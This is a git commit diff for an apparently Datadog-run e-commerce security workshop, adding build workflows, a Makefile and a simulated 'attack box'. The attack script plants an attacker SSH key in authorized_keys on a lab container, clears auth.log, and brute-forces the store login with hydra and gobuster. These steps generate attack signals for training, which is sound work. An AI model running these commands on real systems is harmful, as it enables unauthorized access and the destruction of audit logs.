Attackbox updates (#186)

* add nginx

* remove local

* add nginx

* cleanup

* add label, keep alive script

* supress attackbox logs

* clean local compose

* add ability to hide stack_trace in ruby logs

* update readme

* update readme

* add nginx workflow

* enhancements for security story (#189)

* update development guide and add Makefile

* refine Makefile and incorporate nginx logs

* modify to ensure folder name consistent with image name

* add environment vars to abstract host and port from web attacks

* minor fixes

Co-authored-by: Andrew J Krug <andrewkrug@gmail.com>

Author: stanleegoodspeed

.github/workflows/attackbox.yml

@@ -4,7 +4,7 @@ on:
   push:
     branches: [ main ]
     paths:
-      - attack-box/**
+      - attackbox/**
   workflow_dispatch:
     branches: [ main ]
 
@@ -31,7 +31,7 @@ jobs:
     - name: Build and Push Docker Image
       uses: docker/build-push-action@v2
       with:
-        context: ./attack-box
+        context: ./attackbox
         platforms: linux/amd64
         push: true
         tags: ddtraining/attackbox:latest

.github/workflows/nginx.yml

@@ -0,0 +1,37 @@
+name: Nginx Test and Build
+
+on:
+  push:
+    branches: [ main ]
+    paths:
+      - nginx/**
+  workflow_dispatch:
+    branches: [ main ]
+
+jobs:
+
+  build:
+
+    runs-on: ubuntu-latest
+
+    steps:
+    - name: Checkout Code
+      uses: actions/checkout@v2
+      with:
+        fetch-depth: 0
+    - name: Set up QEMU
+      uses: docker/setup-qemu-action@v1
+    - name: Setup Docker Buildx
+      uses: docker/setup-buildx-action@v1
+    - name: Login to Docker Hub
+      uses: docker/login-action@v1
+      with:
+        username: ${{ secrets.DOCKERHUB_USERNAME }}
+        password: ${{ secrets.DOCKERHUB_TOKEN }}
+    - name: Build and Push Docker Image
+      uses: docker/build-push-action@v2
+      with:
+        context: ./nginx
+        platforms: linux/amd64
+        push: true
+        tags: ddtraining/nginx:latest

.github/workflows/release.yml

@@ -58,3 +58,6 @@ jobs:
           docker pull ddtraining/attackbox:latest
           docker tag ddtraining/attackbox:latest ddtraining/attackbox:$TAG
           docker push ddtraining/attackbox:$TAG
+          docker pull ddtraining/nginx:latest
+          docker tag ddtraining/nginx:latest ddtraining/nginx:$TAG
+          docker push ddtraining/nginx:$TAG

Makefile

@@ -0,0 +1,119 @@
+ROOT_DIR	  			:= $(shell dirname $(realpath $(lastword $(MAKEFILE_LIST))))
+COMMIT_HASH				:= $(shell git rev-parse --short HEAD)
+DOCKER_CONTAINERS 		:= ads-service ads-service-fixed ads-service-errors \
+discounts-service discounts-service-fixed attackbox nginx
+STOREFRONT_CONTAINERS 	:= \
+store-frontend-broken-no-instrumentation \
+store-frontend-broken-instrumented \
+store-frontend-instrumented-fixed
+RUN_ATTACKS				:= 1
+VERSION 				:= 2.1.0
+
+# Note that this Makefile is a work in progress and may duplicate some code in github actions
+
+all:
+	@echo 'Available make targets:'
+	@grep '^[^#[:space:]^\.PHONY.*].*:' Makefile
+
+.PHONY: build-storefront
+build-storefront:
+	for container in $(STOREFRONT_CONTAINERS); do \
+		echo "Building storefront-container $$container against local source." \
+		&& cd store-frontend/ && \
+		docker build . -f storefront-versions/$$container/Dockerfile -t ddtraining/$$container:latest && \
+		cd $(ROOT_DIR); \
+	done
+
+
+.PHONY: build
+build: build-storefront
+	for container in $(DOCKER_CONTAINERS); do \
+		echo "Building $$container against local source." \
+		&& cd $$container && \
+		docker build . -t ddtraining/$$container:latest && \
+		cd $(ROOT_DIR); \
+	done
+	@echo 'All containers have been built locally including the storefront.'
+
+tag-storefront:
+	@echo 'Tagging local storefront containers with version: $(VERSION)'
+	for container in $(STOREFRONT_CONTAINERS); do \
+		echo "Tagging $$container with $(VERSION)." && \
+		docker tag ddtraining/$$container:latest ddtraining/$$container:$(VERSION) ;\
+	done
+
+.PHONY: tag-local-containers
+tag-local-containers: tag-storefront
+	@echo 'Tagging local containers with version: $(VERSION)'
+	for container in $(DOCKER_CONTAINERS); do \
+		echo "Tagging $$container with $(VERSION)." && \
+		docker tag ddtraining/$$container:latest ddtraining/$$container:$(VERSION) ;\
+	done
+	@echo 'Tagging complete all storefront and other containers with: $(VERSION)'
+
+
+.PHONY: clean
+clean:
+	docker system prune -a --volumes
+
+
+.PHONY: recreate-frontend-code
+recreate-frontend-code:
+	cd store-frontend/src/ && \
+	cp -R store-frontend-initial-state store-frontend-broken-instrumented && \
+	cd store-frontend-broken-instrumented && \
+	patch -t -p1 < ../broken-instrumented.patch && \
+	cd .. && \
+	cp -R store-frontend-initial-state store-frontend-instrumented-fixed && \
+	cd store-frontend-instrumented-fixed && \
+	patch -t -p1 < ../instrumented-fixed.patch
+
+
+create-frontend-fixed-diff:
+	cd store-frontend/src/ && \
+	rm instrumented-fixed.patch && \
+	diff -urN store-frontend-initial-state store-frontend-instrumented-fixed | tee instrumented-fixed.patch
+
+
+create-broken-instrumented-diff:
+	cd store-frontend/src/ && \
+	rm broken-instrumented.patch && \
+	diff -urN store-frontend-initial-state store-frontend-broken-instrumented | tee broken-instrumented.patch
+
+
+.PHONY: create-frontend-diffs
+create-frontend-diffs: create-frontend-fixed-diff create-broken-instrumented-diff
+	@echo 'Patches for the frontend have been created.  Do remember to commit them to git.'
+
+
+.PHONY: local-attack-scenario-start
+#.SILENT:
+local-attack-scenario-start:
+	POSTGRES_USER=postgres \
+	POSTGRES_PASSWORD=postgres \
+	ATTACK_HOST=nginx \
+	ATTACK_PORT=80 \
+	DD_API_KEY=${DD_API_KEY} \
+	ATTACK_GOBUSTER=$(RUN_ATTACKS) \
+	ATTACK_GOBUSTER_INTERVAL=180 \
+	ATTACK_HYDRA=$(RUN_ATTACKS) \
+	ATTACK_HYDRA_INTERVAL=120 \
+	ATTACK_SSH=$(RUN_ATTACKS) \
+	ATTACK_SSH_INTERVAL=90 \
+	docker-compose -f deploy/docker-compose/docker-compose-fixed-instrumented-attack.yml up --force-recreate -d
+	@echo 'The local attack scenario has been started.  To live tail the logs run the target for local-attack-scenario-logs.'
+
+
+.PHONY: local-attack-scenario
+local-attack-scenario-logs:
+	docker-compose -f deploy/docker-compose/docker-compose-fixed-instrumented-attack.yml logs -f
+
+
+.PHONY: local-attack-scenario-stop
+local-attack-scenario-stop:
+	docker-compose -f deploy/docker-compose/docker-compose-fixed-instrumented-attack.yml stop
+
+
+.PHONY: local-attack-scenario-restart
+local-attack-scenario-restart:
+	docker-compose -f deploy/docker-compose/docker-compose-fixed-instrumented-attack.yml restart

attack-box/README.md

@@ -12,7 +12,7 @@ RUN export DEBIAN_FRONTEND=noninteractive && \
                  libgtk2.0-dev libmariadb-dev libpq-dev libsvn-dev \
                  firebird-dev libmemcached-dev libgpg-error-dev \
                  libgcrypt20-dev  openssh-client iputils-ping wordlists \
-                 build-essential libpq-dev p7zip unzip && \
+                 build-essential libpq-dev p7zip unzip jq && \
     apt-get clean && \
     rm -rf /var/lib/apt/lists/*
 

attack-box/attack.sh

@@ -0,0 +1,30 @@
+# Attack Box
+
+This is a container that simulates an adversary attempting to hack the online store.
+
+The script has 3 stages:
+1) Malicious SSH configuration
+2) Gobuster
+3) Hydra
+
+## Deployment
+
+The attack box is configurable via environment variables in the `docker compose` command:
+- **ATTACK_SSH**: Set to `1` to run the SSH attack script against the discounts container
+- **ATTACK_GOBUSTER**: Set to `1` to run the Gobuster tool for crawling directories on the frontend container
+- **ATTACK_HYDRA**: Set to `1` to run the Hydra tool for brute force login
+- **ATTACK_SSH_INTERVAL**: Number of seconds between SSH attack invocations (if ommited, SSH attack will run once)
+- **ATTACK_GOBUSTER_INTERVAL**: Number of seconds between GOBUSTER invocations (if ommited, GOBUSTER will run once)
+- **ATTACK_HYDRA_INTERVAL**: Number of seconds between HYDRA invocations (if ommited, HYDRA will run once)
+- **ATTACK_PORT**: The web port you want to run the attacks against for hydra and dirbuster.
+- **ATTACK_HOST**: The web host that hydra and dirbuster will attack. ( Probably frontend or nginx )
+
+Here's an example of what a `docker-compose` command would look like if we wanted to run Gobuster every 500 seconds and Hydra every 900 seconds:
+
+```POSTGRES_USER=postgres POSTGRES_PASSWORD=postgres DD_API_KEY=[API KEY] ATTACK_GOBUSTER=1 ATTACK_GOBUSTER_INTERVAL=500 ATTACK_HYDRA=1 ATTACK_HYDRA_INTERVAL=900 ATTACK_HOST=frontend ATTACK_PORT=3000 docker-compose -f deploy/docker-compose/docker-compose-fixed-instrumented-attack.yml up```
+
+## Local dev
+Run the following commands locally
+1. (Optional) Clean local docker environment of all volumes / containers / images: `docker system prune -a --volumes`
+2. [Recreate the frontend code](https://github.com/DataDog/ecommerce-workshop/blob/main/development.md#recreating-the-code)
+3. Start the app: `POSTGRES_USER=postgres POSTGRES_PASSWORD=postgres DD_API_KEY=[API KEY] ATTACK_GOBUSTER=1 ATTACK_GOBUSTER_INTERVAL=500 ATTACK_HYDRA=1 ATTACK_HYDRA_INTERVAL=900 docker-compose -f deploy/docker-compose/docker-compose-fixed-instrumented-attack.yml up`

attack-box/.dockerignore attackbox/.dockerignoreattack-box/.dockerignore renamed to attackbox/.dockerignore

@@ -0,0 +1,70 @@
+#!/bin/bash
+
+function ssh_attack()
+{
+# attempt to copy attacker key to discounts
+scp -o StrictHostKeyChecking=no ./keys/attacker-key.pub test@discounts:/home/test/.ssh
+
+# attempt to update authorized_keys to have attacker key
+ssh -o StrictHostKeyChecking=no test@discounts /bin/bash <<EOT
+cat /home/test/.ssh/attacker-key.pub >> /home/test/.ssh/authorized_keys
+exit
+EOT
+
+# attempt to clear log file and zero out unallocated disk space
+ssh -o StrictHostKeyChecking=no -i ./keys/attacker-key test@discounts /bin/bash <<EOT
+echo "test" | sudo -S cp /dev/null /var/log/auth.log
+echo "test" | sudo -S dd if=/dev/zero of=tempfile bs=1000000 count=10
+exit
+EOT
+}
+
+if [ "${ATTACK_SSH}" = 1 ];
+then
+  if [[ -z "${ATTACK_SSH_INTERVAL}" ]]
+    then
+      # run single invocation
+      ssh_attack
+    else
+      # run in a loop
+      while true
+      do
+          ssh_attack
+          sleep $ATTACK_SSH_INTERVAL
+      done &
+  fi
+fi
+
+# Add extra sleep to give frontend time to spin up (docker compose dependency is not enough)
+sleep 15
+
+if [ "${ATTACK_GOBUSTER}" = 1 ];
+then
+  if [[ -z "${ATTACK_GOBUSTER_INTERVAL}" ]]
+    then
+      ./gobuster dir -u http://${ATTACK_HOST}:${ATTACK_PORT} -w /usr/share/wordlists/rockyou.txt
+    else
+      while true
+      do
+          ./gobuster dir -u http://${ATTACK_HOST}:${ATTACK_PORT} -w /usr/share/wordlists/rockyou.txt
+          sleep $ATTACK_GOBUSTER_INTERVAL
+      done &
+  fi
+fi
+
+if [ "${ATTACK_HYDRA}" = 1 ];
+then
+  if [[ -z "${ATTACK_HYDRA_INTERVAL}" ]]
+    then
+      hydra -l admin@storedog.com -P /usr/share/wordlists/rockyou.txt -s ${ATTACK_PORT} ${ATTACK_HOST} http-post-form "/login:utf8=%E2%9C%93&authenticity_token=BonCnTVpWzCfGtgqZ7TiwEcSH89jz30%2F01vkNuVsKyKcC8xCF2DqeHF%2Bc%2B4U2CNWeArygGNPX%2BDvONHHz7Dr6Q%3D%3D&spree_user%5Bemail%5D=admin%40storedog.com&spree_user%5Bpassword%5D=^PASS^&spree_user%5Bremember_me%5D=0&commit=Login:Invalid email or password."
+    else
+      while true
+      do
+          hydra -l admin@storedog.com -P /usr/share/wordlists/rockyou.txt -s ${ATTACK_PORT} ${ATTACK_HOST} http-post-form "/login:utf8=%E2%9C%93&authenticity_token=BonCnTVpWzCfGtgqZ7TiwEcSH89jz30%2F01vkNuVsKyKcC8xCF2DqeHF%2Bc%2B4U2CNWeArygGNPX%2BDvONHHz7Dr6Q%3D%3D&spree_user%5Bemail%5D=admin%40storedog.com&spree_user%5Bpassword%5D=^PASS^&spree_user%5Bremember_me%5D=0&commit=Login:Invalid email or password."
+          sleep $ATTACK_HYDRA_INTERVAL
+      done
+  fi
+fi
+
+# keep container alive
+sleep infinity